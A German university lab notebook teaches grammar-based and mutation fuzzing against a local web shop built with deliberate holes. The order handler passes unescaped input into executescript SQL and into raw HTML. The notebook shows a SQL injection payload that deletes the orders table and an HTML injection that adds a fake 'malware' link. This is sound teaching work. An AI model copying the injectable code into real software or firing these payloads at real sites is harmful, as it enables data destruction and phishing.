# Laborübung zum Fuzz-Testing
Im Rahmen der Studienarbeit "Fuzzing-Werkzeuge zum Security-Test" an der DHBW Stuttgart sollte eine Laborübung zum Thema Fuzz-Testing erstellt werden. Die Laborübung soll die Studierenden in die Grundlagen von Fuzz-Testing einführen und sie dazu anleiten, selbstständig eine Website auf Sicherheitslücken zu testen durch die Anwendung von Grammatik-basiertem Fuzzing.

Aufgaben sind mit der Überschrift "AUFGABE" gekennzeichnet. Dort sollen die Studierenden die Schritte befolgen, um die Laborübung abzuschließen.

Zum Setup bitte zuerst die README.md lesen.

Folgende Installationsschritte sind notwendig, um dieses Notebook zu nutzen:  
`pip install ipython selenium multiprocess`


In [ ]:
# Benötigte Imports
import os
import sqlite3
import urllib.parse
import traceback
import requests
import copy
import subprocess
import re
import random
import string
import IPython.core.display

from optparse import Option
from urllib.parse import urljoin
from typing import Any, Optional, NoReturn, Tuple, List, Union, Dict, Callable
from IPython.display import display
from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus
from multiprocess import Queue, Process

## Setup Webserver

### Setup der HTML-Skripts für die Seiten

Ein Dictionary, das die verschiedenen Artikel eines Webstores enthält, dient als Referenz für die angebotenen Artikel.  
Die zugrundeliegenden HTML-Dateien werden aus dem Verzeichnis `html_files` geladen und enthalten HTML-Inhalte für verschiedene Zwecke.  
Mit `IPython.core.display.HTML(html_XX)` werden die HTML-Formulare im Jupyter Notebook angezeigt.  
Für den `Order_received`-Screen wird die Bestellbestätigung mit Platzhalter im HTML angezeigt, sodass die Bestellbestätigung personalisiert wird.


In [ ]:
# Items, die Webstore anbietet
DHBW_MERCH = {
    "tshirtmennavy": "DHBW T-Shirt Navy Men",
    "tshirtwomennavy": "DHBW T-Shirt Navy Women",
    "tshirtmenwhite": "DHBW T-Shirt White Men",
    "tshirtwomenwhite": "DHBW T-Shirt White Women",
    "hoodienavy": "DHBW Hoodie Navy",
    "hoodiegrey": "DHBW Hoodie Grey",
}

with open("html_files/order_form.html", "r", encoding="utf-8") as f:
    html_order_form = f.read()

with open("html_files/terms_and_cond.html", "r", encoding="utf-8") as f:
    html_terms_and_cond = f.read()

with open("html_files/order_received.html", "r", encoding="utf-8") as f:
    html_order_received = f.read()

In [ ]:
IPython.core.display.HTML(html_order_form)

In [ ]:
IPython.core.display.HTML(html_terms_and_cond)

In [ ]:
IPython.core.display.HTML(html_order_received.format(item_name="DHBW T-Shirt White Women",
                                name="Erika Musterfrau",
                                email="erika.musterfrau@example.com",
                                city="Stuttgart",
                                zip="70190"))

### Setup Datenbank
Nun wird eine SQLite-Datenbank initialisiert, die verwendet wird, um Bestellungen zu speichern.  
`ORDERS_DB` speichert den Namen der Datenbankdatei ("orders.db"), die für die Speicherung von Bestellungen verwendet wird.  
Wenn eine Datenbankdatei mit dem Namen "orders.db" existiert, wird sie gelöscht. Sonst wird eine Verbindung zur neuen Datenbank hergestellt.  
Falls die Tabelle `orders` bereits existiert, wird sie entfernt. Anschließend wird eine neue Tabelle `orders` erstellt, die die Spalten `item`, `name`, `email`, `city` und `zip` enthält.  
Die Änderungen werden in der Datenbank gespeichert.  
Die Funktion gibt die Datenbankverbindung zurück.

In [ ]:
ORDERS_DB = "orders.db"

In [ ]:
def init_db():
    if os.path.exists(ORDERS_DB):
        os.remove(ORDERS_DB)

    db_connection = sqlite3.connect(ORDERS_DB)
    db_connection.execute("DROP TABLE IF EXISTS orders")
    db_connection.execute("CREATE TABLE orders "
                          "(item text, name text, email text, "
                          "city text, zip text)")
    db_connection.commit()

    return db_connection

In [ ]:
db = init_db()

#### Beispiel-Interaktion mit DB
```python
# Eintrag hinzufügen

db.execute("INSERT INTO orders " +
           "VALUES ('tshirtmenwhite', 'Erika Musterfrau', "
           "'erika.musterfrau@example.org', 'Stuttgart', '70190')")
db.commit() 

#Eintrag löschen

db.execute("DELETE FROM orders WHERE name = 'Max Mustermann'")
db.commit()
```

### Umgang mit HTTP requests
Der folgende Code definiert einen HTTP-Server, der HTTP-Anfragen verarbeitet und verschiedene HTML-Seiten bereitstellt. Der Server kann auch Bestellungen speichern.

1. **Klasse `SimpleHTTPRequestHandler`**:
    - **`do_GET` Methode**: Diese Methode verarbeitet GET-Anfragen und ist abhängig vom Pfad (entweder eine HTML-Seite oder ein 404-Fehler wird zurückgegeben).
    - **Fehlerbehandlung**: Bei einer Ausnahme wird ein interner Serverfehler zurückgegeben.

2. **Erweiterte `SimpleHTTPRequestHandler`-Klasse**: 
    - **`send_order_form`**: Sendet das HTML-Bestellformular als Antwort.
    - **`send_terms_and_conditions`**: Sendet die HTML-AGB als Antwort.
    - **`get_field_values`**: Extrahiert und gibt die Felder und deren Werte aus der URL-Abfragezeichenfolge zurück.
    - **`handle_order`**: Handhabt eine Bestellung, indem sie die Felder aus der URL extrahiert, die Bestellung speichert und eine Bestellbestätigung sendet.
    - **`store_order`**: Speichert die Bestelldaten in der SQLite-Datenbank.
    - **`send_order_received`**: Sendet eine Bestellbestätigung als Antwort, indem sie die Werte in die Bestätigungs-HTML-Seite einfügt.


In [ ]:
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    pass

    def do_GET(self):
        try:
            if self.path == "/":
                self.send_order_form()
            elif self.path.startswith("/order"):
                self.handle_order()
            elif self.path.startswith("/terms"):
                self.send_terms_and_conditions()
            else:
                self.not_found()
        except Exception:
            self.internal_server_error()

class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_form(self):
        self.send_response(HTTPStatus.OK, "Place your order")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(html_order_form.encode("utf8"))

    def send_terms_and_conditions(self):
        self.send_response(HTTPStatus.OK, "Terms and Conditions")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(html_terms_and_cond.encode("utf8"))

    def get_field_values(self):
        # Note: this fails to decode non-ASCII characters properly
        query_string = urllib.parse.urlparse(self.path).query

        # fields is { 'item': ['tshirtmennavy'], 'name': ['Max Mustermann'], ...}
        fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)

        values = {}
        for key in fields:
            values[key] = fields[key][0]

        return values
    
    def handle_order(self):
        values = self.get_field_values()
        self.store_order(values)
        self.send_order_received(values)

    def store_order(self, values):
        db = sqlite3.connect(ORDERS_DB)
        # The following should be one line
        sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
        self.log_message("%s", sql_command)
        db.executescript(sql_command)
        db.commit()

    def send_order_received(self, values):
        values["item_name"] = DHBW_MERCH[values["item"]]
        confirmation = html_order_received.format(**values).encode("utf8")

        self.send_response(HTTPStatus.OK, "Order received")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(confirmation)

Andere Requests sind möglich, müssen aber implementiert werden.  

### Error Handling
Dieser Code-Block erweitert die Fehlerbehandlung des HTTP-Servers, indem HTML-Seiten bei entsprechenden Fehlern an den Client zurückgesendet.  
Die relevanten HTML-Dateien werden geladen und enthalten die Inhalte für die Fehlerseiten.
Die `SimpleHTTPRequestHandler`-Klasse erweitert die vorherige und implementiert zusätzliche Methoden zur Fehlerbehandlung:
    - **`not_found` Methode**: Diese Methode sendet eine 404-Fehlerseite, wenn die angeforderte Ressource nicht gefunden wird.
    - **`internal_server_error` Methode**: Diese Methode sendet eine 500-Fehlerseite, wenn ein interner Serverfehler auftritt. Zusätzlich wird der Fehler im Server-Log protokolliert.

In [ ]:
with open("html_files/not_found.html", "r", encoding="utf-8") as f:
    html_not_found = f.read()

with open("html_files/internal_server_error.html", "r", encoding="utf-8") as f:
    html_internal_server_error = f.read()

In [ ]:
IPython.core.display.HTML(html_not_found)

In [ ]:
IPython.core.display.HTML(html_internal_server_error)

In [ ]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def not_found(self):
        self.send_response(HTTPStatus.NOT_FOUND, "Not found")

        self.send_header("Content-type", "text/html")
        self.end_headers()

        message = html_not_found
        self.wfile.write(message.encode("utf8"))

    def internal_server_error(self):
        self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")

        self.send_header("Content-type", "text/html")
        self.end_headers()

        exc = traceback.format_exc()
        self.log_message("%s", exc.strip())

        message = html_internal_server_error.format(error_message=exc)
        self.wfile.write(message.encode("utf8"))

### Server Messages
Server-Nachrichten sollen als Logs gesammelt werden. Zum Vereinfachen werden sie abgewandelt angezeigt und in einer Queue gespeichert.

#### Nachrichten stylen

In [ ]:
def rich_output() -> bool:
    try:
        rich = True
    except NameError:
        rich = False

    return rich

# Escaping unicode characters into ASCII for user-facing strings
def unicode_escape(s: str, error: str = 'backslashreplace') -> str:
    def ascii_chr(byte: int) -> str:
        if 0 <= byte <= 127:
            return chr(byte)
        return r"\x%02x" % byte

    bytes = s.encode('utf-8', error)
    return "".join(map(ascii_chr, bytes))

# Same, but escaping unicode only if output is not a terminal
def terminal_escape(s: str) -> str:
    if rich_output():
        return s
    return unicode_escape(s)

#### Queue erstellen
Dieser Code ermöglicht es, Server-Nachrichten als Logs zu sammeln und formatiert anzuzeigen. Die Nachrichten werden in einer Queue gespeichert und können bei Bedarf gedruckt oder gelöscht werden.

In [ ]:
HTTPD_MESSAGE_QUEUE = Queue()

def display_httpd_message(message: str) -> None:
    if rich_output():
        display(
            IPython.core.display.HTML(
                '<pre style="background: NavajoWhite;">' +
                message +
                "</pre>"))
    else:
        print(terminal_escape(message))

def print_httpd_messages():
    while not HTTPD_MESSAGE_QUEUE.empty():
        message = HTTPD_MESSAGE_QUEUE.get()
        display_httpd_message(message)

def clear_httpd_messages() -> None:
    while not HTTPD_MESSAGE_QUEUE.empty():
        HTTPD_MESSAGE_QUEUE.get()

In [ ]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def log_message(self, format: str, *args) -> None:
        message = ("%s - - [%s] %s\n" %
                   (self.address_string(),
                    self.log_date_time_string(),
                    format % args))
        HTTPD_MESSAGE_QUEUE.put(message)

### Server starten
Der HTTP-Server, der auf eingehende Anfragen wartet und diese verarbeitet, wird gestartet. Er enthält Funktionen zum Herunterladen von Webressourcen, zum Starten des Servers und zum Verwalten von Server-Nachrichten.

1. **`webbrowser` Funktion**: Diese Funktion lädt eine Webressource herunter und gibt deren Inhalt zurück. Zusätzlich werden Server-Nachrichten je nach dem `mute` Parameter angezeigt oder gelöscht.
2. **`run_httpd_forever` Funktion**: Diese Funktion startet den HTTP-Server und versucht ihn auf einem Port zwischen 8800 und 9000 zu zuweisen. Der Server läuft ununterbrochen, bis er manuell gestoppt wird.
3. **`start_httpd` Funktion**: Diese Funktion startet den HTTP-Server in einem separaten Prozess und gibt den Prozess und die URL des Servers zurück.
4. Der Server wird gestartet und die URL des Servers wird ausgegeben.

In [ ]:
def webbrowser(url: str, mute: bool = False) -> str:
    try:
        r = requests.get(url)
        contents = r.text
    finally:
        if not mute:
            print_httpd_messages()
        else:
            clear_httpd_messages()

    return contents

In [ ]:
def run_httpd_forever(handler_class: type) -> NoReturn:
    host = "0.0.0.0"
    localhost = "localhost"
    for port in range(8800, 9000):
        httpd_address = (host, port)

        try:
            httpd = HTTPServer(httpd_address, handler_class)
            break
        except OSError:
            continue

    httpd_url = "http://" + localhost + ":" + repr(port)
    HTTPD_MESSAGE_QUEUE.put(httpd_url)
    httpd.serve_forever()

In [ ]:
def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \
        -> Tuple[Process, str]:
    clear_httpd_messages()

    httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
    httpd_process.start()

    httpd_url = HTTPD_MESSAGE_QUEUE.get()
    return httpd_process, httpd_url

httpd_process, httpd_url = start_httpd()
print(httpd_url)

### Beispiel-Interaktion mit dem Webserver
Diese Sektion bietet einen Einblick in den Umgang mit dem Webserver von einem Python-Programm aus.

```python
# get Browser access
IFrame(httpd_url, '100%', 230)

# retrieve messages produced by the HTTP server
print_httpd_messages()

# interact with database
print(db.execute("SELECT * FROM orders").fetchall())

db.execute("DELETE FROM orders")
db.commit()

# retieve the home page
contents = webbrowser(httpd_url)
IPython.core.display.HTML(contents)

# place an order
urljoin(httpd_url, "/order?foo=bar")
contents = webbrowser(urljoin(httpd_url, "/order?item=tshirtmennavy&name=Max+Mustermann&email=max_mustermann%40example.com&city=Bad+Wildbad&zip=28663"))

IPython.core.display.HTML(contents)
print(db.execute("SELECT * FROM orders").fetchall())

# test error messages
IPython.core.display.HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
```

## Fuzzing
Die folgenden Funktionen werden für das Erstellen der Grammatik verwendet.

In [ ]:
# cgi_encode() to encode strings for URLs
def cgi_encode(s: str, do_not_encode: str = "") -> str:
    ret = ""
    for c in s:
        if (c in string.ascii_letters or c in string.digits
                or c in "$-_.+!*'()," or c in do_not_encode):
            ret += c
        elif c == ' ':
            ret += '+'
        else:
            ret += "%%%02x" % ord(c)
    return ret

Expansion = Union[str, Tuple[str, Option]]

# generates a list of characters that includes all characters in the ASCII range from character_start to character_end (inclusive)
def crange(character_start: str, character_end: str) -> List[Expansion]:
    return [chr(i)
            for i in range(ord(character_start), ord(character_end) + 1)]

### ... mit erwarteten Inputs
In dieser Sektion wird das Fuzzing mit erwarteten Inputs durchgeführt.

Es werden eine Grammatik für Bestellungen erstellt, Fuzzing-Eingaben generiert, diese Eingaben verwendet und die gespeicherten Bestellungen in der Datenbank überprüft.  
Die Grammatik `ORDER_GRAMMAR` definiert, wie Bestellungen aufgebaut sind. Sie enthält Regeln für die verschiedenen Teile einer Bestellung wie Artikel, Name, E-Mail, Stadt und Postleitzahl.  
Ein `GrammarFuzzer` wird mit der Bestellgrammatik erstellt und generiert fünf verschiedene Bestell-URLs basierend auf dieser Grammatik.  
Eine der generierten Fuzzing-Eingaben wird verwendet, um eine HTTP-Anfrage an den laufenden Server zu senden. Die HTML-Antwort wird im Jupyter Notebook angezeigt.  
Der Inhalt der Datenbank wird abgefragt und ausgegeben, um sicherzustellen, dass die Bestellungen korrekt gespeichert wurden.

In [ ]:
# create grammar
RE_NONTERMINAL = re.compile(r'(<[^<> ]*>)')

Grammar = Dict[str, List[Expansion]]

DerivationTree = Tuple[str, Optional[List[Any]]]

Outcome = str

def is_nonterminal(s):
    return RE_NONTERMINAL.match(s)

def all_terminals(tree: DerivationTree) -> str:
    (symbol, children) = tree
    if children is None:
        return symbol

    if len(children) == 0:
        # This is a terminal symbol
        return symbol

    # This is an expanded symbol:
    # Concatenate all terminal symbols from all children
    return ''.join([all_terminals(c) for c in children])

class Runner:
    PASS = "PASS"
    FAIL = "FAIL"
    UNRESOLVED = "UNRESOLVED"

    def __init__(self) -> None:
        pass

    def run(self, inp: str) -> Any:
        return (inp, Runner.UNRESOLVED)

class PrintRunner(Runner):
    def run(self, inp) -> Any:
        print(inp)
        return (inp, Runner.UNRESOLVED)

class Fuzzer:
    def __init__(self) -> None:
        pass

    def fuzz(self) -> str:
        return ""

    def run(self, runner: Runner = Runner()) \
            -> Tuple[subprocess.CompletedProcess, Outcome]:
        return runner.run(self.fuzz())

    def runs(self, runner: Runner = PrintRunner(), trials: int = 10) \
            -> List[Tuple[subprocess.CompletedProcess, Outcome]]:
        return [self.run(runner) for i in range(trials)]

START_SYMBOL = "<start>"

In [ ]:
def exp_string(expansion: Expansion) -> str:
    if isinstance(expansion, str):
        return expansion
    return expansion[0]

def expansion_to_children(expansion: Expansion) -> List[DerivationTree]:
    expansion = exp_string(expansion)
    assert isinstance(expansion, str)

    if expansion == "":  # Special case: epsilon expansion
        return [("", [])]

    strings = re.split(RE_NONTERMINAL, expansion)
    return [(s, None) if is_nonterminal(s) else (s, [])
            for s in strings if len(s) > 0]


In [ ]:
class GrammarFuzzer(Fuzzer):
    def __init__(self,
                 grammar: Grammar,
                 start_symbol: str = START_SYMBOL,
                 min_nonterminals: int = 0,
                 max_nonterminals: int = 10,
                 disp: bool = False,
                 log: Union[bool, int] = False) -> None:
        """Erzeuge Strings aus `grammar`, beginnend mit `start_symbol`.
        Wenn `min_nonterminals` oder `max_nonterminals` angegeben sind, verwende sie als Grenzen
        für die Anzahl der erzeugten Nichtterminalsymbole.
        Wenn `disp` gesetzt ist, zeige die Zwischenableitungsbäume an.
        Wenn `log` gesetzt ist, zeige Zwischenstufen als Text in der Standardausgabe an."""

        self.grammar = grammar
        self.start_symbol = start_symbol
        self.min_nonterminals = min_nonterminals
        self.max_nonterminals = max_nonterminals
        self.disp = disp
        self.log = log

    # Weitere Methoden zum Erweitern von Knoten und Bäumen

    def expand_node_max_cost(self, node: DerivationTree) -> DerivationTree:
        if self.log:
            print("Expanding", all_terminals(node), "at maximum cost")

        return self.expand_node_by_cost(node, max)

    def possible_expansions(self, node: DerivationTree) -> int:
        (symbol, children) = node
        if children is None:
            return 1

        return sum(self.possible_expansions(c) for c in children)

    def any_possible_expansions(self, node: DerivationTree) -> bool:
        (symbol, children) = node
        if children is None:
            return True

        return any(self.any_possible_expansions(c) for c in children)

    def expansion_to_children(self, expansion: Expansion) -> List[DerivationTree]:
        return expansion_to_children(expansion)


    def expand_node_randomly(self, node: DerivationTree) -> DerivationTree:
        (symbol, children) = node
        assert children is None

        if self.log:
            print("Expanding", all_terminals(node), "randomly")

        # Fetch the possible expansions from grammar...
        expansions = self.grammar[symbol]
        children_alternatives: List[List[DerivationTree]] = [
            self.expansion_to_children(expansion) for expansion in expansions
        ]

        # ... and select a random expansion
        index = self.choose_node_expansion(node, children_alternatives)
        chosen_children = children_alternatives[index]

        # Process children (for subclasses)
        chosen_children = self.process_chosen_children(chosen_children,
                                                       expansions[index])

        # Return with new children
        return (symbol, chosen_children)

    def choose_tree_expansion(self,
                              tree: DerivationTree,
                              children: List[DerivationTree]) -> int:
        return random.randrange(0, len(children))

    def expand_tree_once(self, tree: DerivationTree) -> DerivationTree:
        (symbol, children) = tree
        if children is None:
            # Expand this node
            return self.expand_node(tree)

        # Find all children with possible expansions
        expandable_children = [
            c for c in children if self.any_possible_expansions(c)]

        index_map = [i for (i, c) in enumerate(children)
                     if c in expandable_children]

        # Select a random child
        child_to_be_expanded = \
            self.choose_tree_expansion(tree, expandable_children)

        # Expand in place
        children[index_map[child_to_be_expanded]] = \
            self.expand_tree_once(expandable_children[child_to_be_expanded])

        return tree

    def log_tree(self, tree: DerivationTree) -> None:
        if self.log:
            print("Tree:", all_terminals(tree))

    def expand_tree_with_strategy(self, tree: DerivationTree,
                                  expand_node_method: Callable,
                                  limit: Optional[int] = None):
        self.expand_node = expand_node_method
        while ((limit is None
                or self.possible_expansions(tree) < limit)
               and self.any_possible_expansions(tree)):
            tree = self.expand_tree_once(tree)
            self.log_tree(tree)
        return tree

    def expand_tree(self, tree: DerivationTree) -> DerivationTree:
        self.log_tree(tree)
        tree = self.expand_tree_with_strategy(
            tree, self.expand_node_max_cost, self.min_nonterminals)
        tree = self.expand_tree_with_strategy(
            tree, self.expand_node_randomly, self.max_nonterminals)
        tree = self.expand_tree_with_strategy(
            tree, self.expand_node_min_cost)

        assert self.possible_expansions(tree) == 0

        return tree

    def init_tree(self) -> DerivationTree:
        return (self.start_symbol, None)

    def fuzz_tree(self) -> DerivationTree:
        tree = self.init_tree()

        # Expand all nonterminals
        tree = self.expand_tree(tree)
        if self.log:
            print(repr(all_terminals(tree)))
        return tree

    # Produce string from grammar
    def fuzz(self) -> str:
        self.derivation_tree = self.fuzz_tree()
        return all_terminals(self.derivation_tree)

    def choose_node_expansion(self, node: DerivationTree,
                              children_alternatives: List[List[DerivationTree]]) -> int:
        return random.randrange(0, len(children_alternatives))

    def process_chosen_children(self,
                                chosen_children: List[DerivationTree],
                                expansion: Expansion) -> List[DerivationTree]:
        return chosen_children

    def expand_node_min_cost(self, node: DerivationTree) -> DerivationTree:
        if self.log:
            print("Expanding", all_terminals(node), "at minimum cost")

        return self.expand_node_by_cost(node, min)

#### AUFGABE
1. Ergänze die folgende Grammatik, sodass erwartete URLs generiert werden können.  
Eine Beispiel URL könnte so aussehen:
`http://localhost:8800/order?item=hoodienavy&name=Erika+Musterfrau&email=e.musterfrau%40example.com&city=Bad+Wildbad&zip=00850`  
Bedenke, dass nur der URL-Pfad generiert werden muss. Das Start-Symbol ist `<start>`.  
Nutze `crange` und `cgi_encode` um die Zeichen zu kodieren.

In [ ]:
ORDER_GRAMMAR: Grammar = {
    "<start>": ["<order>"],
    "<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
    "<item>": ["tshirtmennavy", "tshirtwomennavy", "tshirtmenwhite", "tshirtwomenwhite", "hoodienavy", "hoodiegrey"],
    "<name>": [cgi_encode("Erika Musterfrau"), cgi_encode("Max Mustermann")],
    "<email>": [cgi_encode("e.musterfrau@example.com"), cgi_encode("max_mustermann@example.com")],
    "<city>": ["Stuttgart", cgi_encode("Bad Wildbad")],
    "<zip>": ["<digit>" * 5],
    "<digit>": crange('0', '9')
}

2. Generiere fünf verschiedene Bestell-URLs basierend auf der Grammatik.

In [ ]:
# create fuzz inputs
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]

In [ ]:
# use fuzz inputs
IPython.core.display.HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

3. Teste, ob die Bestellungen korrekt gespeichert wurden, indem du die Datenbank abfragst und die Bestellungen ausgibst.

In [ ]:
# check
print(db.execute("SELECT * FROM orders").fetchall())

### ... mit unerwarteten Inputs
In dieser Sektion wird das Fuzzing mit unerwarteten Inputs durchgeführt.

Der Code beinhaltet die Erstellung eines Seeds, die Mutation dieses Seeds, das Fuzzing bis zum Auftreten eines Fehlers und die Minimierung des fehlerhaften Pfads mit Delta-Debugging.

1. **Seed erstellen**: Ein initialer Fuzzing-Input (Seed) wird aus der Grammatik generiert.
2. **Seed mutieren**: Funktionen zur Mutation des Seeds werden definiert, die zufällig Zeichen löschen, einfügen oder flippen.
3. **MutationFuzzer erstellen**: Ein Fuzzer wird erstellt, der den Seed mutiert, um neue Fuzzing-Eingaben zu erzeugen.
4. **Fuzzing durchführen**: Der Fuzzer wird verwendet, um neue Eingaben zu generieren und bis zum Auftreten eines Fehlers zu testen.
5. **Fehlerhaften Pfad minimieren**: Der fehlerhafte Pfad wird mit Delta-Debugging minimiert, um den kleinsten Eingabe zu finden, der den Fehler verursacht.

In [ ]:
# create seed
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
seed = order_fuzzer.fuzz()
seed

#### AUFGABE
Im Folgenden sollen die Funktionen, die benötigt werden um den seed zu mutieren implementiert werden.
Die Funktionen sollen wie folgt implementiert werden:
- `delete_random_character`: Löscht ein zufälliges Zeichen aus der Eingabe.
- `insert_random_character`: Fügt ein zufälliges Zeichen in die Eingabe ein.
- `flip_random_character`: Ändert ein zufälliges Zeichen in der Eingabe.
Die Funktion `mutate` soll eine der drei Mutationen zufällig auswählen und auf die Eingabe anwenden.

In [ ]:
# mutate seed    
def delete_random_character(s: str) -> str:
    if s == "":
        return s

    pos = random.randint(0, len(s) - 1)
    return s[:pos] + s[pos + 1:]

def insert_random_character(s: str) -> str:
    pos = random.randint(0, len(s))
    random_character = chr(random.randrange(32, 127))
    return s[:pos] + random_character + s[pos:]

def flip_random_character(s):
    if s == "":
        return s

    pos = random.randint(0, len(s) - 1)
    c = s[pos]
    bit = 1 << random.randint(0, 6)
    new_c = chr(ord(c) ^ bit)
    return s[:pos] + new_c + s[pos + 1:]

def mutate(s: str) -> str:
    mutators = [
        delete_random_character,
        insert_random_character,
        flip_random_character
    ]
    mutator = random.choice(mutators)
    return mutator(s)

In [ ]:
class MutationFuzzer(Fuzzer):
    def __init__(self, seed: List[str],
                 min_mutations: int = 2,
                 max_mutations: int = 10) -> None:
        
        self.seed = seed
        self.min_mutations = min_mutations
        self.max_mutations = max_mutations
        self.reset()

    def reset(self) -> None:
        self.population = self.seed
        self.seed_index = 0

    def create_candidate(self) -> str:
        candidate = random.choice(self.population)
        trials = random.randint(self.min_mutations, self.max_mutations)
        for i in range(trials):
            candidate = self.mutate(candidate)
        return candidate

    def fuzz(self) -> str:
        if self.seed_index < len(self.seed):
            # Still seeding
            self.inp = self.seed[self.seed_index]
            self.seed_index += 1
        else:
            # Mutating
            self.inp = self.create_candidate()
        return self.inp

    def mutate(self, inp: str) -> str:
        return mutate(inp)

In [ ]:
# create fuzzing inputs
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]

In [ ]:
# fuzz till error
while True:
    path = mutate_order_fuzzer.fuzz()
    url = urljoin(httpd_url, path)
    r = requests.get(url)
    if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
        break

In [ ]:
# get path that caused error
failing_path = path
failing_path

In [ ]:
# minimize with delta debugging
class WebRunner(Runner):
    def __init__(self, base_url: Optional[str] = None):
        self.base_url = base_url

    def run(self, url: str) -> Tuple[str, str]:
        if self.base_url is not None:
            url = urljoin(self.base_url, url)

        r = requests.get(url)
        if r.status_code == HTTPStatus.OK:
            return url, Runner.PASS
        elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
            return url, Runner.FAIL
        else:
            return url, Runner.UNRESOLVED
        
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)

In [ ]:
class Reducer:
    def __init__(self, runner: Runner, log_test: bool = False) -> None:
        self.runner = runner
        self.log_test = log_test
        self.reset()

    def reset(self) -> None:
        self.tests = 0

    def test(self, inp: str) -> Outcome:
        result, outcome = self.runner.run(inp)
        self.tests += 1
        if self.log_test:
            print("Test #%d" % self.tests, repr(inp), repr(len(inp)), outcome)
        return outcome

    def reduce(self, inp: str) -> str:
        self.reset()
        return inp

class CachingReducer(Reducer):
    def reset(self):
        super().reset()
        self.cache = {}

    def test(self, inp):
        if inp in self.cache:
            return self.cache[inp]

        outcome = super().test(inp)
        self.cache[inp] = outcome
        return outcome

class DeltaDebuggingReducer(CachingReducer):
    
    def reduce(self, inp: str) -> str:
        self.reset()
        assert self.test(inp) != Runner.PASS

        n = 2     # Initial granularity
        while len(inp) >= 2:
            start = 0.0
            subset_length = len(inp) / n
            some_complement_is_failing = False

            while start < len(inp):
                complement = inp[:int(start)] + \
                    inp[int(start + subset_length):]

                if self.test(complement) == Runner.FAIL:
                    inp = complement
                    n = max(n - 1, 2)
                    some_complement_is_failing = True
                    break

                start += subset_length

            if not some_complement_is_failing:
                if n == len(inp):
                    break
                n = min(n * 2, len(inp))

        return inp

In [ ]:
# finding failing input
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path

## Web-Attacken auf den Webserver
In dieser Sektion wird eine Web-Attacke auf den Webserver durchgeführt.

### SQL-Injection

In [ ]:
# extends grammar by copying it and adding new rules
def extend_grammar(grammar: Grammar, extension: Grammar = {}) -> Grammar:
    new_grammar = copy.deepcopy(grammar)
    new_grammar.update(extension)
    return new_grammar

Die folgenden Zeilen sind ein Beispiel dafür, wie ein SQL command aussehen kann.

In [ ]:
values: Dict[str, str] = {
    "item": "tshirtmenwhite",
    "name": "Erika Musterfrau",
    "email": "erika.musterfrau@example.com",
    "city": "Stuttgart",
    "zip": "70190"
}

sql_command = ("INSERT INTO orders " +
               "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))

##### AUFGABE
Passe nun den Wert des Namens so an, dass die Datenbank gelöscht wird und die SQL-Injection erfolgreich ist.

In [ ]:
# design the name field to be a SQL injection
values["name"] = "Erika', 'x', 'x', 'x'); DELETE FROM orders; -- "

sql_command = ("INSERT INTO orders " +
               "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))

In [ ]:
# extend the grammar
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [cgi_encode("Erika', 'x', 'x', 'x'); DELETE FROM orders; --")],
})

In [ ]:
# create fuzzing inputs
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql

In [ ]:
# check for success
print(db.execute("SELECT * FROM orders").fetchall())

contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))

print(db.execute("SELECT * FROM orders").fetchall())

### HTML Injection
##### AUFGABE
Passe den Wert des Namens so an, dass ein externer Link in der Bestellbestätigung angezeigt wird.

In [ ]:
# extend the grammar
ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [cgi_encode('''
    Erika Mustermann<p>
    <strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
    </p>
    ''')],
})

In [ ]:
# create fuzzing inputs
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html

In [ ]:
# check for success
IPython.core.display.HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))